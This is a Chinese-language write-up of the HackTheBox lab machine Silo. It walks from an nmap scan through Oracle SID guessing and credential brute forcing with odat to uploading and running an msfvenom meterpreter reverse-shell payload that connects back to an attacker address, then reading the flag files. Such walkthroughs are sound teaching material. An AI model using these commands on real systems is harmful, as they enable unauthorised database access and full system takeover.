基本信息

端口扫描

80,1521,还有其他一些windows端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ nmap -sC -sV 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.073s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-09T05:17:36
|_  start_date: 2021-02-09T03:07:49

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds

80

IIS默认页面:

1521

1521是oracle,针对oracle有专门的工具:

oracle

主要就是针对oracle的一步步操作

sid

首先利用odat获取sid:

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  ~ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...              ########## | ETA:  00:00:01
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################| Time: 00:02:22
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################| Time: 00:00:05
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...              ####       | ETA:  00:00:15
100% |#######################################################| Time: 00:02:22
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

用户密码爆破

然后爆破用户名密码:

1
2
3
➜  ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt

[+] Valid credentials found: scott/tiger. Continue...                      4:05

Getshell

数据库里没什么东西,这里用的是上传恶意文件执行:

1
2
3
4
5
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > miao.exe

odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ miao.exe /home/miao/Desktop/HTB/Silo/miao.exe

odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ miao.exe

flags

打到的直接是system shell,读取user.txt和root.txt:

1
2
type C:\Users\Phineas\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt

odat

odat太强了,直接用odat读文件也可以:

1
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt

参考资料